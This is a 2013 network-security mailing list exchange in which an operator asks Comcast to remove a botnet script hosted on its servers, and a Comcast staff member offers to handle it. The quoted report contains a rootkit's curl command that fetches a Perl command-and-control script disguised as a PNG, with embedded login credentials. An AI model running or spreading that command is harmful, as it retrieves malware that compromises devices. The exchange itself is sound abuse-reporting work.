[nsp-sec] Comcast - please remove botnet script
Griffiths, Chris
Chris_Griffiths at Cable.Comcast.com
Fri Mar 22 12:42:57 EDT 2013
On Mar 18, 2013, at 8:22 AM, Andy Davidson <andy at lonap.net> wrote:
> ----------- nsp-security Confidential --------
>
> Hi,
>
> Seen in a root kit script :
>
> curl ftp://kuhnhunter:kuhndog@home.comcast.net/apache_32.png
>
> It's a perl script for communicating with a C&C system.
>
> If Comcast could nuke that (and maybe perform some analysis on the logs of
> possibly owned devices talking to it ?), that would be great.
Andy,
Do you know if this was handled? If not, I will get this handled today.
Thanks
More information about the nsp-security
mailing list